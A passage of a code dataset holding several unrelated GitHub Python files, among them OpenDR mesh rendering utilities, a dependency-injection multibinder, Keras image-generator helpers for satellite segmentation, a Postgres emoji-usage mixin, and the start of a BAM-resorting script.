'-Wl,-h,%s'\nSTLIBPATH_ST = '-L%s'\nSTLIB_MARKER = '-Wl,-Bstatic'\nSTLIB_ST = '-l%s'\ncprogram_PATTERN = '%s'\ncshlib_PATTERN = 'lib%s.so'\ncstlib_PATTERN = 'lib%s.a'\ndefine_key = ['PYTHONDIR', 'PYTHONARCHDIR', 'HAVE_PYEMBED', 'HAVE_PYEXT', 'HAVE_PYTHON_H']\nmacbundle_PATTERN = '%s.bundle'\npyext_PATTERN = '%s.cpython-34m.so'\n","repo_name":"couchjd/Playground","sub_path":"python/libraries/pysoy/build/c4che/_cache.py","file_name":"_cache.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71617852947","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport cv2\nimport code\nimport opendr\nimport math\nfrom opendr.camera import ProjectPoints\nfrom opendr.renderer import ColoredRenderer, TexturedRenderer\nfrom opendr.lighting import LambertianPointLight\nimport random\n\n\n# Rotate the points by a specified angle.\ndef rotateY(points, angle):\n ry = np.array([\n [np.cos(angle), 0., np.sin(angle)], [0., 1., 0.],\n [-np.sin(angle), 0., np.cos(angle)]\n ])\n return np.dot(points, ry)\n\ndef draw_skeleton(input_image, joints, draw_edges=True, vis=None, radius=None):\n \"\"\"\n joints is 3 x 19. 
but if not will transpose it.\n 0: Right ankle\n 1: Right knee\n 2: Right hip\n 3: Left hip\n 4: Left knee\n 5: Left ankle\n 6: Right wrist\n 7: Right elbow\n 8: Right shoulder\n 9: Left shoulder\n 10: Left elbow\n 11: Left wrist\n 12: Neck\n 13: Head top\n 14: nose\n 15: left_eye\n 16: right_eye\n 17: left_ear\n 18: right_ear\n \"\"\"\n\n if radius is None:\n radius = max(4, (np.mean(input_image.shape[:2]) * 0.01).astype(int))\n\n colors = {\n 'pink': (197, 27, 125), # L lower leg\n 'light_pink': (233, 163, 201), # L upper leg\n 'light_green': (161, 215, 106), # L lower arm\n 'green': (77, 146, 33), # L upper arm\n 'red': (215, 48, 39), # head\n 'light_red': (252, 146, 114), # head\n 'light_orange': (252, 141, 89), # chest\n 'purple': (118, 42, 131), # R lower leg\n 'light_purple': (175, 141, 195), # R upper\n 'light_blue': (145, 191, 219), # R lower arm\n 'blue': (69, 117, 180), # R upper arm\n 'gray': (130, 130, 130), #\n 'white': (255, 255, 255), #\n }\n\n image = input_image.copy()\n input_is_float = False\n\n if np.issubdtype(image.dtype, np.float):\n input_is_float = True\n max_val = image.max()\n if max_val <= 2.: # should be 1 but sometimes it's slightly above 1\n image = (image * 255).astype(np.uint8)\n else:\n image = (image).astype(np.uint8)\n\n if joints.shape[0] != 2:\n joints = joints.T\n joints = np.round(joints).astype(int)\n\n jcolors = [\n 'light_pink', 'light_pink', 'light_pink', 'pink', 'pink', 'pink',\n 'light_blue', 'light_blue', 'light_blue', 'blue', 'blue', 'blue',\n 'purple', 'purple', 'red', 'green', 'green', 'white', 'white',\n 'purple', 'purple', 'red', 'green', 'green', 'white', 'white'\n ]\n\n if joints.shape[1] == 19:\n # parent indices -1 means no parents\n parents = np.array([\n 1, 2, 8, 9, 3, 4, 7, 8, 12, 12, 9, 10, 14, -1, 13, -1, -1, 15, 16\n ])\n # Left is light and right is dark\n ecolors = {\n 0: 'light_pink',\n 1: 'light_pink',\n 2: 'light_pink',\n 3: 'pink',\n 4: 'pink',\n 5: 'pink',\n 6: 'light_blue',\n 7: 'light_blue',\n 8: 'light_blue',\n 9: 'blue',\n 10: 'blue',\n 11: 'blue',\n 12: 'purple',\n 17: 'light_green',\n 18: 'light_green',\n 14: 'purple'\n }\n elif joints.shape[1] == 14:\n parents = np.array([\n 1,\n 2,\n 8,\n 9,\n 3,\n 4,\n 7,\n 8,\n -1,\n -1,\n 9,\n 10,\n 13,\n -1,\n ])\n ecolors = {\n 0: 'light_pink',\n 1: 'light_pink',\n 2: 'light_pink',\n 3: 'pink',\n 4: 'pink',\n 5: 'pink',\n 6: 'light_blue',\n 7: 'light_blue',\n 10: 'light_blue',\n 11: 'blue',\n 12: 'purple'\n }\n elif joints.shape[1] == 21: # hand\n parents = np.array([\n -1,\n 0,\n 1,\n 2,\n 3,\n 0,\n 5,\n 6,\n 7,\n 0,\n 9,\n 10,\n 11,\n 0,\n 13,\n 14,\n 15,\n 0,\n 17,\n 18,\n 19,\n ])\n ecolors = {\n 0: 'light_purple',\n 1: 'light_green',\n 2: 'light_green',\n 3: 'light_green',\n 4: 'light_green',\n 5: 'pink',\n 6: 'pink',\n 7: 'pink',\n 8: 'pink',\n 9: 'light_blue',\n 10: 'light_blue',\n 11: 'light_blue',\n 12: 'light_blue',\n 13: 'light_red',\n 14: 'light_red',\n 15: 'light_red',\n 16: 'light_red',\n 17: 'purple',\n 18: 'purple',\n 19: 'purple',\n 20: 'purple',\n }\n else:\n print('Unknown skeleton!!')\n\n for child in range(len(parents)):\n point = joints[:, child]\n # If invisible skip\n if vis is not None and vis[child] == 0:\n continue\n if draw_edges:\n cv2.circle(image, (point[0], point[1]), radius, colors['white'],\n -1)\n cv2.circle(image, (point[0], point[1]), radius - 1,\n colors[jcolors[child]], -1)\n else:\n # cv2.circle(image, (point[0], point[1]), 5, colors['white'], 1)\n cv2.circle(image, (point[0], point[1]), radius - 1,\n colors[jcolors[child]], 1)\n # 
cv2.circle(image, (point[0], point[1]), 5, colors['gray'], -1)\n pa_id = parents[child]\n if draw_edges and pa_id >= 0:\n if vis is not None and vis[pa_id] == 0:\n continue\n point_pa = joints[:, pa_id]\n cv2.circle(image, (point_pa[0], point_pa[1]), radius - 1,\n colors[jcolors[pa_id]], -1)\n if child not in ecolors.keys():\n print('bad')\n cv2.line(image, (point[0], point[1]), (point_pa[0], point_pa[1]),\n colors[ecolors[child]], radius - 2)\n\n # Convert back in original dtype\n if input_is_float:\n if max_val <= 1.:\n image = image.astype(np.float32) / 255.\n else:\n image = image.astype(np.float32)\n\n return image\n\ndef draw_text(input_image, content):\n \"\"\"\n content is a dict. draws key: val on image\n Assumes key is str, val is float\n \"\"\"\n image = input_image.copy()\n input_is_float = False\n if np.issubdtype(image.dtype, np.float):\n input_is_float = True\n image = (image * 255).astype(np.uint8)\n\n black = (255, 255, 0)\n margin = 15\n start_x = 5\n start_y = margin\n for key in sorted(content.keys()):\n text = \"%s: %.2g\" % (key, content[key])\n cv2.putText(image, text, (start_x, start_y), 0, 0.45, black)\n start_y += margin\n\n if input_is_float:\n image = image.astype(np.float32) / 255.\n return image\n\ndef visualize_reconstruction_opendr(img, vertices, camera, renderer, color='light_blue', focal_length=1000):\n \"\"\"\n Renderer is an instance of OpenDR Renderer.\n \"\"\"\n # Fix a flength so i can render this with persp correct scale\n res = img.shape[1]\n camera_t = np.array([camera[1], camera[2], 2*focal_length/(res * camera[0] +1e-9)])\n rend_img = renderer.render(vertices, camera_t=camera_t,\n img=img, use_bg=True,\n focal_length=focal_length,\n body_color=color)\n\n combined = np.hstack([img, rend_img])\n\n return combined\n\ndef visualize_reconstruction_multi_view_opendr(img, vertices, camera, renderer, color='light_blue', focal_length=1000):\n # Fix a flength so i can render this with persp correct scale\n res = img.shape[1]\n camera_t = np.array([camera[1], camera[2], 2*focal_length/(res * camera[0] +1e-9)])\n rend_img = renderer.render(vertices, camera_t=camera_t,\n img=img, use_bg=True,\n focal_length=focal_length,\n body_color='light_blue')\n\n # rotate\n aroundy0 = cv2.Rodrigues(np.array([0, np.radians(0.), 0]))[0]\n aroundy1 = cv2.Rodrigues(np.array([0, np.radians(90.), 0]))[0]\n aroundy2 = cv2.Rodrigues(np.array([0, np.radians(180.), 0]))[0]\n aroundy3 = cv2.Rodrigues(np.array([0, np.radians(270.), 0]))[0]\n aroundy4 = cv2.Rodrigues(np.array([0, np.radians(45.), 0]))[0]\n center = vertices.mean(axis=0)\n rot_vertices0 = np.dot((vertices - center), aroundy0) + center\n rot_vertices1 = np.dot((vertices - center), aroundy1) + center\n rot_vertices2 = np.dot((vertices - center), aroundy2) + center\n rot_vertices3 = np.dot((vertices - center), aroundy3) + center\n rot_vertices4 = np.dot((vertices - center), aroundy4) + center\n \n # # Render non-parametric shape\n img_side0 = renderer.render(rot_vertices0, camera_t=camera_t,\n img=np.ones_like(img), use_bg=True,\n focal_length=focal_length,\n body_color='light_blue')\n img_side1 = renderer.render(rot_vertices1, camera_t=camera_t,\n img=np.ones_like(img), use_bg=True,\n focal_length=focal_length,\n body_color='light_blue')\n img_side2 = renderer.render(rot_vertices2, camera_t=camera_t,\n img=np.ones_like(img), use_bg=True,\n focal_length=focal_length,\n body_color='light_blue')\n img_side3 = renderer.render(rot_vertices3, camera_t=camera_t,\n img=np.ones_like(img), use_bg=True,\n 
focal_length=focal_length,\n body_color='light_blue')\n img_side4 = renderer.render(rot_vertices4, camera_t=camera_t,\n img=np.ones_like(img), use_bg=True,\n focal_length=focal_length,\n body_color='light_blue')\n\n combined = np.hstack([img, rend_img, img_side0, img_side1, img_side2, img_side3, img_side4])\n\n return combined\n\ndef visualize_reconstruction_smpl_opendr(img, vertices, camera, renderer, smpl_vertices, color='light_blue', focal_length=1000):\n # Fix a flength so i can render this with persp correct scale\n res = img.shape[1]\n camera_t = np.array([camera[1], camera[2], 2*focal_length/(res * camera[0] +1e-9)])\n rend_img = renderer.render(vertices, camera_t=camera_t,\n img=img, use_bg=True,\n focal_length=focal_length,\n body_color=color)\n \n rend_img_smpl = renderer.render(smpl_vertices, camera_t=camera_t,\n img=img, use_bg=True,\n focal_length=focal_length,\n body_color=color)\n\n combined = np.hstack([img, rend_img, rend_img_smpl])\n\n return combined\n\n\ndef cam2pixel(cam_coord, f, c):\n x = cam_coord[:, 0] / (cam_coord[:, 2]) * f[0] + c[0]\n y = cam_coord[:, 1] / (cam_coord[:, 2]) * f[1] + c[1]\n z = cam_coord[:, 2]\n img_coord = np.concatenate((x[:,None], y[:,None], z[:,None]),1)\n return img_coord\n\n\nclass OpenDR_Renderer(object):\n \"\"\"\n Render mesh using OpenDR for visualization.\n \"\"\"\n\n def __init__(self, width=800, height=600, near=0.5, far=1000, faces=None):\n self.colors = {'hand': [.9, .9, .9], 'pink': [.9, .7, .7], 'light_blue': [0.65098039, 0.74117647, 0.85882353] }\n self.width = width\n self.height = height\n self.faces = faces\n self.renderer = ColoredRenderer()\n\n def render(self, vertices, faces=None, img=None,\n camera_t=np.zeros([3], dtype=np.float32),\n camera_rot=np.zeros([3], dtype=np.float32),\n camera_center=None,\n use_bg=False,\n bg_color=(0.0, 0.0, 0.0),\n body_color=None,\n focal_length=5000,\n disp_text=False,\n gt_keyp=None,\n pred_keyp=None,\n **kwargs):\n if img is not None:\n height, width = img.shape[:2]\n else:\n height, width = self.height, self.width\n\n if faces is None:\n faces = self.faces\n\n if camera_center is None:\n camera_center = np.array([width * 0.5,\n height * 0.5])\n\n self.renderer.camera = ProjectPoints(rt=camera_rot,\n t=camera_t,\n f=focal_length * np.ones(2),\n c=camera_center,\n k=np.zeros(5))\n dist = np.abs(self.renderer.camera.t.r[2] -\n np.mean(vertices, axis=0)[2])\n far = dist + 20\n\n self.renderer.frustum = {'near': 1.0, 'far': far,\n 'width': width,\n 'height': height}\n\n if img is not None:\n if use_bg:\n self.renderer.background_image = img\n else:\n self.renderer.background_image = np.ones_like(\n img) * np.array(bg_color)\n\n if body_color is None:\n color = self.colors['light_blue']\n else:\n color = self.colors[body_color]\n\n if isinstance(self.renderer, TexturedRenderer):\n color = [1.,1.,1.]\n\n self.renderer.set(v=vertices, f=faces,\n vc=color, bgcolor=np.ones(3))\n albedo = self.renderer.vc\n # Construct Back Light (on back right corner)\n yrot = np.radians(120)\n\n self.renderer.vc = LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([-200, -100, -100]), yrot),\n vc=albedo,\n light_color=np.array([1, 1, 1]))\n\n # Construct Left Light\n self.renderer.vc += LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([800, 10, 300]), yrot),\n vc=albedo,\n light_color=np.array([1, 1, 1]))\n\n # Construct Right Light\n self.renderer.vc 
+= LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([-500, 500, 1000]), yrot),\n vc=albedo,\n light_color=np.array([.7, .7, .7]))\n\n return self.renderer.r\n\n\n def render_vertex_color(self, vertices, faces=None, img=None,\n camera_t=np.zeros([3], dtype=np.float32),\n camera_rot=np.zeros([3], dtype=np.float32),\n camera_center=None,\n use_bg=False,\n bg_color=(0.0, 0.0, 0.0),\n vertex_color=None,\n focal_length=5000,\n disp_text=False,\n gt_keyp=None,\n pred_keyp=None,\n **kwargs):\n if img is not None:\n height, width = img.shape[:2]\n else:\n height, width = self.height, self.width\n\n if faces is None:\n faces = self.faces\n\n if camera_center is None:\n camera_center = np.array([width * 0.5,\n height * 0.5])\n\n self.renderer.camera = ProjectPoints(rt=camera_rot,\n t=camera_t,\n f=focal_length * np.ones(2),\n c=camera_center,\n k=np.zeros(5))\n dist = np.abs(self.renderer.camera.t.r[2] -\n np.mean(vertices, axis=0)[2])\n far = dist + 20\n\n self.renderer.frustum = {'near': 1.0, 'far': far,\n 'width': width,\n 'height': height}\n\n if img is not None:\n if use_bg:\n self.renderer.background_image = img\n else:\n self.renderer.background_image = np.ones_like(\n img) * np.array(bg_color)\n\n if vertex_color is None:\n vertex_color = self.colors['light_blue']\n\n\n self.renderer.set(v=vertices, f=faces,\n vc=vertex_color, bgcolor=np.ones(3))\n albedo = self.renderer.vc\n # Construct Back Light (on back right corner)\n yrot = np.radians(120)\n\n self.renderer.vc = LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([-200, -100, -100]), yrot),\n vc=albedo,\n light_color=np.array([1, 1, 1]))\n\n # Construct Left Light\n self.renderer.vc += LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([800, 10, 300]), yrot),\n vc=albedo,\n light_color=np.array([1, 1, 1]))\n\n # Construct Right Light\n self.renderer.vc += LambertianPointLight(\n f=self.renderer.f,\n v=self.renderer.v,\n num_verts=self.renderer.v.shape[0],\n light_pos=rotateY(np.array([-500, 500, 1000]), yrot),\n vc=albedo,\n light_color=np.array([.7, .7, .7]))\n\n return self.renderer.r","repo_name":"postech-ami/FastMETRO","sub_path":"src/utils/renderer_opendr.py","file_name":"renderer_opendr.py","file_ext":"py","file_size_in_byte":17822,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"48"} +{"seq_id":"11450658600","text":"def module():\r\n numb = input(\"Введіть число \")\r\n str_numb = str(numb)\r\n sum1 = 0\r\n for i in range(len(str_numb)):\r\n sum1+= int(str_numb[i])\r\n print(\"Сума \", sum1)\r\n max1 = max(numb)\r\n min1 = min(numb)\r\n print(\"Максимальна цифра \", max1)\r\n print(\"Мінімальна цифра \", min1)\r\n return(module)\r\nmodule() ","repo_name":"MaksKulinich/MKG","sub_path":"modulelab.py","file_name":"modulelab.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25585217868","text":"from snakeguice import providers\nfrom snakeguice.annotation import Annotation\nfrom snakeguice.binder import Key\nfrom snakeguice.decorators import inject\nfrom snakeguice.interfaces import Injector\nfrom snakeguice.errors import MultiBindingError\n\n\nclass _MultiBinder(object):\n\n def __init__(self, binder, interface):\n self._binder = binder\n 
self._interface = interface\n        self._provider = self._get_or_create_provider()\n\n    def _get_or_create_provider(self):\n        key = Key(self.multibinding_type(self._interface))\n        binding = self._binder.get_binding(key)\n        if not binding:\n            self._binder.bind(self.multibinding_type(self._interface),\n                              to_provider=self._create_provider())\n            binding = self._binder.get_binding(key)\n        return binding.provider\n\n    def _dsl_to_provider(self, to, to_provider, to_instance):\n        if to:\n            #TODO: add some validation\n            return providers.create_simple_provider(to)\n        elif to_provider:\n            #TODO: add some validation\n            return to_provider\n        elif to_instance:\n            #TODO: add some validation\n            return providers.create_instance_provider(to_instance)\n        else:\n            raise MultiBindingError('incorrect arguments to %s.add_binding'\n                                    % self.__class__.__name__)\n\n\nclass List(Annotation):\n    \"\"\"Used for binding lists.\"\"\"\n\n\nclass ListBinder(_MultiBinder):\n\n    multibinding_type = List\n\n    def add_binding(self, to=None, to_provider=None, to_instance=None):\n        provider = self._dsl_to_provider(to, to_provider, to_instance)\n        self._provider.add_provider(provider)\n\n    def _create_provider(self):\n        class DynamicMultiBindingProvider(object):\n            providers = []\n\n            @inject(injector=Injector)\n            def __init__(self, injector):\n                self._injector = injector\n\n            @classmethod\n            def add_provider(cls, provider):\n                cls.providers.append(provider)\n\n            def get(self):\n                return [self._injector.get_instance(p).get()\n                        for p in self.providers]\n\n        return DynamicMultiBindingProvider\n\n\nclass Dict(Annotation):\n    \"\"\"Used for binding dictionaries.\"\"\"\n\n\nclass DictBinder(_MultiBinder):\n\n    multibinding_type = Dict\n\n    def add_binding(self, key, to=None, to_provider=None, to_instance=None):\n        provider = self._dsl_to_provider(to, to_provider, to_instance)\n        self._provider.add_provider(key, provider)\n\n    def _create_provider(self):\n        binder_self = self\n\n        class DynamicMultiBindingProvider(object):\n            providers = {}\n\n            @inject(injector=Injector)\n            def __init__(self, injector):\n                self._injector = injector\n\n            @classmethod\n            def add_provider(cls, key, provider):\n                if key in cls.providers:\n                    msg = ('duplicate binding for %r in Dict(%s) found'\n                           % (key, binder_self._interface.__name__))\n                    raise MultiBindingError(msg)\n                cls.providers[key] = provider\n\n            def get(self):\n                return dict([(k, self._injector.get_instance(p).get())\n                             for k, p in self.providers.items()])\n\n        return DynamicMultiBindingProvider\n","repo_name":"dstanek/snake-guice.orig","sub_path":"snakeguice/multibinder.py","file_name":"multibinder.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"}
{"seq_id":"20636476039","text":"import numpy as np\nimport sys\nfrom keras import backend as K\nfrom custom_image import (ImageDataGenerator, \n                          standardize, \n                          random_transform, \n                          random_crop, \n                          center_crop, \n                          pick_channels, \n                          get_max_class,\n                          get_soft_class)\nimport tensorflow as tf\nimport pickle\nimport os\nimport tables\n\ndef _pickle_fit_vars(path, fit_vars):\n    data_file = open(path, 'wb')\n    pickle.dump(fit_vars, data_file)\n    data_file.close()\n\ndef _preload_data(data_dir, read_format='tbl'):\n    \"\"\"Utility function which preloads the data from the directory\n    \"\"\"\n    X = []\n    #if data_dir == 'masks/':\n    #    running_sum = np.zeros(10)\n    #else:\n    #    running_sum = np.zeros(20)\n    for im in os.listdir(data_dir):\n        print('Preloading image {}'.format(im))\n        if read_format == 'npy':\n            x = 
np.load(os.path.join(data_dir, im))\n elif read_format == 'tbl':\n with tables.open_file(os.path.join(data_dir, im), 'r') as h5_file:\n x = h5_file.root.carray.read()\n #running_sum += np.sum(x, axis=(0,1))\n X.append(x)\n\n \n #print((3349*3389*25-np.sum(running_sum))/running_sum)\n\n return np.asarray(X)\n\ndef setup_generator(data_dir,\n batch_size=1,\n augment=False,\n shape_gen=(572,572),\n shape_gen_out=None,\n mask_channels=None,\n seed=0,\n verbose=1,\n norm_gen=True,\n classify=None,\n preload=False,\n read_format='tbl'):\n \"\"\"Utility function to help set up generators\n \"\"\"\n\n if augment:\n datagen = ImageDataGenerator(\n featurewise_center=norm_gen,\n featurewise_std_normalization=norm_gen,\n featurewise_standardize_axis=(0, 1, 2),\n rotation_range=90,\n horizontal_flip=True,\n vertical_flip=True,\n fill_mode='reflect',\n seed=seed,\n verbose=verbose)\n else:\n datagen = ImageDataGenerator(\n featurewise_center=norm_gen,\n featurewise_std_normalization=norm_gen,\n featurewise_standardize_axis=(0, 1, 2),\n fill_mode='reflect',\n seed=seed,\n verbose=verbose)\n\n datagen.config['random_crop_size'] = shape_gen\n datagen.config['sync_seed'] = seed\n datagen.config['seed'] = seed\n if shape_gen_out:\n datagen.config['center_crop_size'] = shape_gen_out\n else:\n datagen.config['center_crop_size'] = shape_gen \n\n # sets which channels to use for fitting\n # note that is -1 is included, a 'no pixel' channel is appended\n datagen.config['channel_idxs'] = mask_channels\n\n if augment and norm_gen:\n datagen.set_pipeline([random_crop, random_transform, standardize, center_crop, pick_channels])\n elif augment and not norm_gen:\n datagen.set_pipeline([random_crop, random_transform, center_crop, pick_channels])\n elif not augment and norm_gen:\n datagen.set_pipeline([random_crop, standardize, center_crop, pick_channels])\n else:\n datagen.set_pipeline([random_crop, center_crop, pick_channels])\n\n if classify == 'hard':\n datagen.set_pipeline([get_max_class])\n elif classify == 'soft':\n datagen.set_pipeline([get_soft_class])\n \n # define how the data is flowing from the directory\n # If we are preloading, we load up the data and then\n # use flow to iterate the numpy array\n if preload:\n # load up X data, assuming in tbl format\n X = _preload_data(data_dir, read_format)\n # flow does not need y (the labeled data) to be \n # passed, we can zip it up later\n datagen_flow = datagen.flow(X,\n batch_size=batch_size,\n seed=seed)\n else:\n datagen_flow = datagen.flow_from_directory(data_dir,\n class_mode=None,\n read_formats={read_format},\n image_reader=read_format,\n batch_size=batch_size,\n seed=seed)\n X = None\n\n return (datagen, datagen_flow, X)\n\n\ndef get_classifier_generators(batch_size=4,\n augment=False,\n nb_iter=200,\n shape_in=(572, 572),\n seed=0,\n verbose=1,\n norm_path='gen_norm.p',\n preload=False,\n read_format='tbl'):\n \"\"\" Creates starting classifier net to pre-train\n auto-encoder \"\"\"\n (datagen_X, dgdx, X) = setup_generator(data_dir = 'images/train/',\n shape_gen = shape_in,\n augment = augment,\n batch_size = batch_size,\n preload=preload,\n read_format=read_format)\n (datagen_Y, dgdy, y) = setup_generator(data_dir = 'masks/',\n shape_gen = shape_in,\n shape_gen_out = shape_out,\n augment = augment,\n classify = 'soft',\n batch_size=batch_size,\n preload=preload,\n read_format=read_format)\n\n datagen_X.fit_generator(dgdx, nb_iter=nb_iter)\n\n dg_mean = datagen_X.config['mean']\n dg_std = datagen_X.config['std']\n print('Generator fitted, mean: {mean}, 
std: {std}'.format(mean=dg_mean, \n std=dg_std))\n\n _pickle_fit_vars(norm_path, (dg_mean, dg_std))\n\n classify_generator = dgdx + dgdy\n return classify_generator\n\n\ndef get_ae_generators(batch_size=4,\n augment=False,\n nb_iter=200,\n shape_in=(572,572),\n shape_out=(388,388),\n seed=0,\n verbose=1,\n norm_path='gen_norm.p',\n read_format='tbl',\n preload=False):\n \"\"\" Creates generators for autoencoder net\n \"\"\"\n\n # The autoencoder pulls images from both test and train\n # sets, avoiding over-fitting and giving better results\n (datagen_X, dgdx, X) = setup_generator(data_dir = 'images/train',\n shape_gen = shape_in,\n augment = augment,\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n (datagen_Y, dgdy, y) = setup_generator(data_dir = 'images/train',\n shape_gen = shape_out,\n augment = augment,\n mask_channels = (0, 1, 2),\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n\n # fit generator for normalization\n datagen_X.fit_generator(dgdx, nb_iter=nb_iter)\n\n # transfer over learned norm parameters\n x_mean = datagen_X.config['mean']\n x_std = datagen_X.config['std']\n datagen_Y.config['mean'] = x_mean \n datagen_Y.config['std'] = x_std\n\n # Save variables\n _pickle_fit_vars(norm_path, (x_mean, x_std))\n\n # pack up and return generator\n autoencode_generator = dgdx + dgdy\n\n return autoencode_generator\n\n\ndef get_generators(batch_size=8,\n augment=False,\n nb_iter=200,\n shape_in=(572,572, 20),\n shape_out=(388,388, 11),\n seed=0,\n verbose=1,\n channel_idxs=None,\n norm_path=None,\n read_format='tbl',\n preload=False):\n\n assert channel_idxs is None or len(channel_idxs) == shape_out[2]\n shape_in = (shape_in[0], shape_in[1])\n shape_out = (shape_out[0], shape_out[1])\n\n (datagen_X, dgdx, X) = setup_generator(data_dir = 'images/train/',\n shape_gen = shape_in,\n augment = augment,\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n (datagen_Y, dgdy, y) = setup_generator(data_dir = 'masks/train/',\n shape_gen = shape_in,\n shape_gen_out = shape_out,\n augment = augment,\n norm_gen = False,\n mask_channels=channel_idxs,\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n (datagen_validX, dvdx, vX) = setup_generator(data_dir = 'images/valid/',\n shape_gen = shape_in,\n augment = False,\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n (datagen_validY, dvdy, vy) = setup_generator(data_dir = 'masks/valid/',\n shape_gen = shape_in,\n shape_gen_out = shape_out,\n augment = False,\n norm_gen = False,\n mask_channels=channel_idxs,\n batch_size=batch_size,\n read_format=read_format,\n preload=preload)\n\n\n # enforce syncing\n datagen_X.config['sync_seed'] = seed\n datagen_Y.config['sync_seed'] = seed\n\n datagen_validX.config['sync_seed'] = seed\n datagen_validY.config['sync_seed'] = seed\n # use previously fitted values from autoencoder run, otherwise\n # refit generator\n if norm_path in os.listdir():\n data_file = open(norm_path, 'rb')\n (x_mean, x_std) = pickle.load(data_file)\n data_file.close()\n\n datagen_X.config['mean'] = x_mean\n datagen_X.config['std'] = x_std\n else:\n datagen_X.fit_generator(dgdx, nb_iter=nb_iter)\n\n\n # make sure the validation data is using the same mean/std\n datagen_validX.config['mean'] = datagen_X.config['mean']\n datagen_validX.config['std'] = datagen_X.config['std']\n # synchronize the two generators (+ operation creates tuple)\n train_generator = dgdx + dgdy\n valid_generator = dvdx + dvdy\n\n # return the zipped up generators\n 
return (train_generator, valid_generator)\n\n","repo_name":"platawiec/sat-segment","sub_path":"generator_utils.py","file_name":"generator_utils.py","file_ext":"py","file_size_in_byte":11572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2002108982","text":"from datetime import datetime\nfrom typing import List, Tuple, Optional\nfrom discord import PartialEmoji\nfrom .._connection import _PostgresConnection\n\n\nclass EmojisUsedMixin(_PostgresConnection):\n async def add_used_emotes(self, to_cache: List[Tuple[int, PartialEmoji, datetime]]):\n params = {\n \"times\": [],\n \"guild_ids\": [],\n \"names\": [],\n \"ids\": [],\n \"animateds\": [],\n }\n\n for guild_id, emote, time in to_cache:\n params[\"guild_ids\"].append(guild_id)\n params[\"times\"].append(time)\n params[\"names\"].append(emote.name)\n params[\"ids\"].append(emote.id)\n params[\"animateds\"].append(emote.animated)\n\n await self.cur.execute(\n f\"INSERT INTO emotes_used (time, guild_id, name, emote_id, animated) VALUES (unnest(%(times)s), unnest(%(guild_ids)s), unnest(%(names)s), unnest(%(ids)s), unnest(%(animateds)s))\",\n parameters=params\n )\n\n async def get_recently_used_emote(self, guild_id: int, name: str) -> Optional[PartialEmoji]:\n await self.cur.execute(\n \"SELECT first(animated, time), first(name, time), emote_id FROM emotes_used WHERE guild_id=%(guild_id)s and lower(\\\"name\\\")=%(name)s group by emote_id\",\n parameters={\"guild_id\": guild_id, \"name\": name.lower()}\n )\n emotes = await _get_emotes(self.cur)\n if emotes:\n return next((emote for emote in emotes if emote.name == name), emotes[0])\n\n async def get_recently_used_emotes(self, guild_id: int, prefix: str, limit: int = 25) -> List[PartialEmoji]:\n if not prefix:\n await self.cur.execute(\n \"select first(animated, time), first(name, time), emote_id from emotes_used where guild_id=%(guild_id)s group by emote_id limit %(limit)s\",\n parameters={\"guild_id\": guild_id, \"limit\": limit}\n )\n else:\n # This one doesn't use an index for the whole thing. Should be OK though\n await self.cur.execute(\n \"select first(animated, time), first(name, time), emote_id from emotes_used where guild_id=%(guild_id)s and starts_with(lower(\\\"name\\\"), %(prefix)s) group by emote_id limit %(limit)s\",\n parameters={\"guild_id\": guild_id, \"prefix\": prefix, \"limit\": limit}\n )\n return await _get_emotes(self.cur)\n\n\nasync def _get_emotes(cur) -> List[PartialEmoji]:\n results = await cur.fetchall()\n return [\n PartialEmoji(animated=animated, name=name.rstrip(\" \"), id=id)\n for animated, name, id in results\n ]\n","repo_name":"NQN-Discord/sql_helper","sub_path":"sql_helper/mixins/emojis_used.py","file_name":"emojis_used.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73350677906","text":"#!/usr/bin/env python\n\"\"\"Resort a BAM file karyotypically to match GATK's preferred file order.\n\nBroad's GATK and associated resources prefer BAM files sorted as:\n\n chr1, chr2... chr10, chr11... 
chrX\n\ninstead of the simple alphabetic sort:\n\n chr1, chr10, chr2 ...\n\nThis takes sorted BAM files with an alternative ordering of chromosomes\nand re-sorts them the karyotypic way.\n\nUsage:\n resort_bam_karyotype.py <reference.dict> <in.bam> [<in.bam> ...]\n\n<reference.dict> is a *.dict file produced by Picard that identifies the order\nof chromosomes to sort by:\n\njava -jar CreateSequenceDictionary.jar REFERENCE=your.fasta OUTPUT=your.dict\n\nRequires:\n pysam -- http://code.google.com/p/pysam/\n\"\"\"\nimport os\nimport sys\n\nimport pysam\n\ndef main(ref_file, *in_bams):\n ref = pysam.Samfile(ref_file, \"r\")\n sorter = SortByHeader(ref.header)\n for bam in in_bams:\n sort_bam(bam, sorter.header_cmp, sorter.to_include)\n\ndef sort_bam(in_bam, sort_fn, to_include=None):\n out_file = \"%s-ksort%s\" % os.path.splitext(in_bam)\n index_file = \"%s.bai\" % in_bam\n if not os.path.exists(index_file):\n pysam.index(in_bam)\n\n orig = pysam.Samfile(in_bam, \"rb\")\n chroms = [(c[\"SN\"], c) for c in orig.header[\"SQ\"]]\n new_chroms = 